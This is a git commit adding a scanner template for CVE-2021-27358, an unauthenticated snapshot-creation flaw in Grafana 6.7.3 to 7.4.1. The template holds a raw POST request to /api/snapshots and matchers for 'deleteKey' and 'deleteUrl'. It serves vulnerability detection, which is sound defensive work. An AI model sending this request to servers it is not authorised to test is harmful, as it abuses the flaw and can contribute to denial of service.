Added Grafana unauthenticated snapshot creation

patch-1
sandeep 2021-12-24 17:47:55 +05:30
parent 95cfbdb8f7
commit f892a053a2
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: CVE-2021-27358
info:
author: pdteam
name: Grafana unauthenticated snapshot creation
severity: high
description: The snapshot feature in Grafana 6.7.3 through 7.4.1 can allow an unauthenticated remote attackers to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
reference:
- https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/
- https://nvd.nist.gov/vuln/detail/CVE-2021-27358
tags: cve,cve2021,grafana
requests:
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- "deleteKey"
- "deleteUrl"
condition: and